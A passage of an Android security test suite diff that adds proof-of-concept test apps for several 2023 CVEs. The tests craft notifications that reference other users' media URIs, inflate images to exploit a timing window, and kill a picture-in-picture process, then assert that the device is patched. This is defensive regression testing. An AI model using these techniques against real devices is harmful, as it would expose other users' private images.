+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="broadcastAction">CVE_2023_21144_action</string>
+ <string name="dataMimeType">image/png</string>
+ <string name="failMessage">Device is vulnerable to b/252766417 !!</string>
+ <string name="fileNotCreated">image file is not created</string>
+ <string name="imageFile">cve_2023_21144.png</string>
+ <string name="message">CVE_2023_21144_message</string>
+ <string name="notificationChannelId">CVE_2023_21144_notification_channel_id</string>
+ <string name="notificationChannelName">CVE_2023_21144_notification_channel_name</string>
+ <string name="notificationListenerNotConnected">notification listener not connected!!</string>
+ <string name="notificationText">CVE_2023_21144_notification_text</string>
+ <string name="resourceId">android:id/message_text</string>
+ <string name="systemUiPkgName">com.android.systemui</string>
+ <string name="username">CVE_2023_21144_username</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/DeviceTest.java
new file mode 100644
index 0000000..e91c3ea
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/DeviceTest.java
@@ -0,0 +1,197 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21144;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.Notification.MessagingStyle;
+import android.app.Notification.MessagingStyle.Message;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.Person;
+import android.app.StatusBarManager;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.graphics.Bitmap;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.Environment;
+import android.os.Handler;
+import android.os.HandlerThread;
+import android.widget.ImageView;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.File;
+import java.io.FileOutputStream;
+import java.util.concurrent.CompletableFuture;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testPocCVE_2023_21144() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+
+ try (AutoCloseable withTemporaryImage = withTemporaryImage(context)) {
+ // Prepare notification channel
+ NotificationChannel notificationChannel =
+ new NotificationChannel(
+ context.getString(R.string.notificationChannelId),
+ context.getString(R.string.notificationChannelName),
+ NotificationManager.IMPORTANCE_HIGH);
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(notificationChannel);
+
+ // Prepare messaging style
+ Person person =
+ new Person.Builder().setName(context.getString(R.string.username)).build();
+ Message message =
+ new Message(context.getString(R.string.message), 0L /* timestamp */, person)
+ .setData(
+ context.getString(R.string.dataMimeType),
+ Uri.fromFile(getImageFile(context)));
+ MessagingStyle messagingStyle = new MessagingStyle(person).addMessage(message);
+
+ // Build notification
+ Notification notification =
+ new Notification.Builder(context, notificationChannel.getId())
+ .setContentText(context.getString(R.string.notificationText))
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */,
+ 0 /* offset */,
+ 0 /* length */))
+ .setStyle(messagingStyle)
+ .build();
+
+ // Register BroadcastReceiver
+ Semaphore broadcastReceived = new Semaphore(0);
+ BroadcastReceiver broadcastReceiver =
+ new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ broadcastReceived.release();
+ } catch (Exception ignore) {
+ // Ignore
+ }
+ }
+ };
+ IntentFilter broadcastFilter =
+ new IntentFilter(context.getString(R.string.broadcastAction));
+ context.registerReceiver(broadcastReceiver, broadcastFilter);
+
+ // Send notification and wait for broadcast to get received
+ notificationManager.notify(0 /* notification id */, notification);
+ final long timeout = 10_000L;
+ assumeTrue(
+ context.getString(R.string.notificationListenerNotConnected),
+ broadcastReceived.tryAcquire(timeout, TimeUnit.MILLISECONDS));
+
+ // With fix, the notification does not contain image. Hence, using uiautomator
+ // to detect the imageview to fail test
+ context.getSystemService(StatusBarManager.class).expandNotificationsPanel();
+ final UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+ UiObject2 uiObject =
+ uiDevice.wait(
+ Until.findObject(
+ By.pkg(context.getString(R.string.systemUiPkgName))
+ .res(context.getString(R.string.resourceId))
+ .desc(context.getString(R.string.message))
+ .clazz(ImageView.class.getName())),
+ timeout);
+ assertNull(context.getString(R.string.failMessage), uiObject);
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ private AutoCloseable withTemporaryImage(Context context) throws Exception {
+ // Create a png file in a worker Thread.
+ CompletableFuture<Boolean> imageIsReady = new CompletableFuture<Boolean>();
+ final HandlerThread handlerThread = new HandlerThread(context.getPackageName());
+ handlerThread.start();
+ new Handler(handlerThread.getLooper())
+ .post(
+ () -> {
+ try {
+ // The dimension of 13000 x 17000 creates png image of size ~2mb
+ // which is sufficient to extend loading time of 100ms.
+ final int sufficientlyLargeWidth = 13000;
+ final int sufficientlyLargeHeight = 17000;
+ Bitmap bitmap =
+ Bitmap.createBitmap(
+ sufficientlyLargeWidth,
+ sufficientlyLargeHeight,
+ Bitmap.Config.ARGB_8888);
+ File imageFile = getImageFile(context);
+ imageFile.createNewFile();
+ FileOutputStream fileOutputStream = new FileOutputStream(imageFile);
+ bitmap.compress(
+ Bitmap.CompressFormat.PNG,
+ 100 /* quality */,
+ fileOutputStream);
+ fileOutputStream.flush();
+ fileOutputStream.close();
+ imageIsReady.complete(true);
+ } catch (Exception ignore) {
+ imageIsReady.complete(false);
+ }
+ });
+
+ // Wait until image gets created successfully
+ assumeTrue(
+ context.getString(R.string.fileNotCreated),
+ imageIsReady.get() && getImageFile(context).exists());
+
+ return () -> {
+ File imageFile = getImageFile(context);
+ if (imageFile.exists()) {
+ imageFile.delete();
+ }
+ };
+ }
+
+ private File getImageFile(Context context) {
+ return Environment.buildPath(
+ Environment.getExternalStorageDirectory(),
+ Environment.DIRECTORY_DOWNLOADS,
+ context.getString(R.string.imageFile));
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/PocListenerService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/PocListenerService.java
new file mode 100644
index 0000000..77508a6
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/src/android/security/cts/CVE_2023_21144/PocListenerService.java
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21144;
+
+import android.content.Intent;
+import android.service.notification.NotificationListenerService;
+import android.service.notification.StatusBarNotification;
+
+public class PocListenerService extends NotificationListenerService {
+
+ @Override
+ public void onNotificationPosted(StatusBarNotification sbn) {
+ try {
+ // Send broadcast when notification is posted
+ sendBroadcast(new Intent(getString(R.string.broadcastAction)));
+ } catch (Exception ignore) {
+ // Ignore as it causes assumptionFailure in DeviceTest
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/Android.bp
new file mode 100644
index 0000000..bb5bd8a
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/Android.bp
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21145",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/AndroidManifest.xml
new file mode 100644
index 0000000..c0be6bd
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/AndroidManifest.xml
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21145">
+
+ <application>
+ <activity
+ android:name=".PipActivity"
+ android:exported="true"
+ android:supportsPictureInPicture="true"
+ android:process=":pipActivity" />
+
+ <activity android:name=".PocActivity"
+ android:taskAffinity="taskAffinity.cve_2023_21145" />
+ </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PipActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PipActivity.java
new file mode 100644
index 0000000..65d2aff
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PipActivity.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package android.security.cts.CVE_2023_21145;
+
+import android.app.Activity;
+import android.app.PictureInPictureParams;
+import android.content.Intent;
+import android.os.Handler;
+import android.os.HandlerThread;
+import android.os.Process;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+public class PipActivity extends Activity {
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+
+ // Start PocActivity
+ startActivity(new Intent(this, PocActivity.class).setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Create HandlerThread and post the Runnable tasks
+ HandlerThread handlerThread = new HandlerThread(getPackageName());
+ handlerThread.start();
+ Handler handler = new Handler(handlerThread.getLooper());
+
+ // Enter into pip mode after 2000 ms delay
+ final long timeout = 2_000L;
+ handler.postDelayed(
+ () -> enterPictureInPictureMode(new PictureInPictureParams.Builder().build()),
+ timeout);
+
+ // Kill current process after 2000 ms delay of entering pip mode
+ Semaphore releaseOnResume = new Semaphore(0);
+ handler.postDelayed(
+ () -> {
+ Process.killProcess(Process.myTid());
+ releaseOnResume.release();
+ },
+ timeout * 2);
+
+ // To hold the process in onResume until the process dies.
+ try {
+ releaseOnResume.tryAcquire(10_000L /* timeout */, TimeUnit.MILLISECONDS);
+ } catch (InterruptedException ignore) {
+ // Ignore
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PocActivity.java
similarity index 80%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PocActivity.java
index 4416990..b160ee5 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21145/src/android/security/cts/CVE_2023_21145/PocActivity.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21145;
import android.app.Activity;
-public class PocActivity extends Activity {
-}
+public class PocActivity extends Activity {}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/Android.bp
new file mode 100644
index 0000000..949556b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21238",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/AndroidManifest.xml
new file mode 100644
index 0000000..6c0315e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21238">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21238" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/res/layout/cve_2023_21238_layout.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/res/layout/cve_2023_21238_layout.xml
new file mode 100644
index 0000000..555c9f7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/res/layout/cve_2023_21238_layout.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<ImageView xmlns:android="http://schemas.android.com/apk/res/android"
+ android:id="@+id/cve_2023_21238_img"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/src/android/security/cts/CVE_2023_21238/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/src/android/security/cts/CVE_2023_21238/DeviceTest.java
new file mode 100644
index 0000000..d8090d0
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21238/src/android/security/cts/CVE_2023_21238/DeviceTest.java
@@ -0,0 +1,144 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21238;
+
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private AutoCloseable withAdoptShellPermissionIdentity(
+ UiAutomation uiAutomation, String permission) {
+ uiAutomation.adoptShellPermissionIdentity(permission);
+
+ // Remove permissions
+ return () -> uiAutomation.dropShellPermissionIdentity();
+ }
+
+ @Test
+ public void testPocCVE_2023_21238() {
+ UiDevice uiDevice = null;
+ try {
+ final String cveId = "cve_2023_21238_";
+ final String title = cveId + "title";
+
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ UiAutomation uiAutomation = instrumentation.getUiAutomation();
+ uiDevice = UiDevice.getInstance(instrumentation);
+ int userId = -1;
+
+ // Retrieve created user Id
+ try (AutoCloseable withAdoptShellPermissionIdentity =
+ withAdoptShellPermissionIdentity(
+ uiAutomation, android.Manifest.permission.CREATE_USERS)) {
+ final List<UserInfo> list = context.getSystemService(UserManager.class).getUsers();
+ for (UserInfo info : list) {
+ if (info.name.contains(cveId)) {
+ userId = info.id;
+ break;
+ }
+ }
+ }
+ assumeTrue(userId != -1);
+
+ // Post a notification with a content view containing image from other user
+ RemoteViews rvPortrait =
+ new RemoteViews(context.getPackageName(), R.layout.cve_2023_21238_layout);
+ rvPortrait.setImageViewUri(
+ R.id.cve_2023_21238_img,
+ ContentProvider.maybeAddUserId(EXTERNAL_CONTENT_URI, userId));
+ NotificationChannel notificationChannel =
+ new NotificationChannel(cveId, cveId, NotificationManager.IMPORTANCE_DEFAULT);
+ RemoteViews rvOuter = new RemoteViews(rvPortrait, rvPortrait);
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(notificationChannel);
+ Notification notification =
+ new Notification.Builder(context, cveId)
+ .setContentTitle(title)
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+ .setCustomContentView(rvOuter)
+ .setCustomBigContentView(rvOuter)
+ .build();
+ try {
+ notificationManager.notify(0 /* id */, notification);
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(EXTERNAL_CONTENT_URI.toString())) {
+ // Ignore exception thrown with fix and exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Open notification shade
+ assumeTrue("Opening notification shade unsuccessful", uiDevice.openNotification());
+
+ // Wait for notification to appear and detect if the remote view is present
+ uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */);
+ UiObject2 exposedImg =
+ uiDevice.findObject(By.res(context.getPackageName(), cveId + "img"));
+ assertNull(
+ "Device is vulnerable to b/277740848, Other user's images can be exposed in"
+ + " notifications using remote views",
+ exposedImg);
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiDevice.pressHome();
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/Android.bp
new file mode 100644
index 0000000..4a33f83
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21239",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "sts-device-util",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/AndroidManifest.xml
new file mode 100644
index 0000000..b8fcfe3
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/AndroidManifest.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21239">
+
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+ <uses-permission android:name="android.permission.USE_FULL_SCREEN_INTENT" />
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21239" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/src/android/security/cts/CVE_2023_21239/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/src/android/security/cts/CVE_2023_21239/DeviceTest.java
new file mode 100644
index 0000000..f56a217
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21239/src/android/security/cts/CVE_2023_21239/DeviceTest.java
@@ -0,0 +1,185 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21239;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.PendingIntent;
+import android.app.Person;
+import android.app.UiAutomation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.UserInfo;
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.UserHandle;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.service.notification.StatusBarNotification;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ Instrumentation mInstrumentation;
+
+ private AutoCloseable withAdoptShellPermissionIdentity(String permission) {
+ UiAutomation uiAutomation = mInstrumentation.getUiAutomation();
+ uiAutomation.adoptShellPermissionIdentity(permission);
+
+ // Remove permissions
+ return () -> uiAutomation.dropShellPermissionIdentity();
+ }
+
+ @Test
+ public void testCallStyleNotification() {
+ try {
+ mInstrumentation = getInstrumentation();
+ Context context = mInstrumentation.getContext();
+ int testUserId = -1;
+
+ // Retrieve created user Id
+ try (AutoCloseable withAdoptShellPermissionIdentity =
+ withAdoptShellPermissionIdentity(android.Manifest.permission.CREATE_USERS)) {
+ final List<UserInfo> list =
+ context.getSystemService(UserManager.class).getUsers(true);
+ for (UserInfo info : list) {
+ if (info.toString().contains("cve_2023_21239_user" /* testUser name */)) {
+ testUserId = info.getUserHandle().getIdentifier();
+ break;
+ }
+ }
+ }
+ assumeTrue(testUserId != -1);
+
+ // Create a pending intent for notification
+ Intent intent = new Intent();
+ PendingIntent pendingIntent =
+ PendingIntent.getActivity(
+ context, 0 /* request code */, intent, PendingIntent.FLAG_MUTABLE);
+
+ // Retrieve contentUri with userId
+ Uri contentUriWithUser =
+ ContentProvider.createContentUriForUser(
+ MediaStore.Images.Media.EXTERNAL_CONTENT_URI,
+ UserHandle.of(testUserId));
+
+ // Create personIcon using URI to access the media from cve_2023_21239_User
+ Icon personIcon = Icon.createWithContentUri(contentUriWithUser);
+
+ // Create person
+ Person person =
+ new Person.Builder()
+ .setName("cve_2023_21239_person" /* person name */)
+ .setIcon(personIcon)
+ .setImportant(true /* high priority */)
+ .build();
+
+ // Create style so that the notification created is callStyle
+ Notification.CallStyle style =
+ Notification.CallStyle.forOngoingCall(person, pendingIntent);
+
+ // Create smallIcon for notification
+ Bitmap testBitmap =
+ Bitmap.createBitmap(30 /* width */, 30 /* height */, Bitmap.Config.ARGB_8888);
+ final Canvas canvas = new Canvas(testBitmap);
+ canvas.drawColor(Color.BLUE);
+ Icon notificationIcon = Icon.createWithBitmap(testBitmap);
+
+ // Set notification channel id
+ String notificationChannelId = "notification_channel_id";
+
+ // Create notification
+ Notification callNotification =
+ new Notification.Builder(context, notificationChannelId)
+ .setStyle(style)
+ .setCategory(Notification.CATEGORY_CALL)
+ .setSmallIcon(notificationIcon)
+ .setContentIntent(pendingIntent)
+ .setFullScreenIntent(pendingIntent, true /* high priority */)
+ .build();
+
+ // Create a notification channel
+ NotificationChannel notificationChannel =
+ new NotificationChannel(
+ notificationChannelId,
+ "cve_2023_21239_notification_channel" /* notification channel name */,
+ NotificationManager.IMPORTANCE_HIGH);
+
+ // Post the notification
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
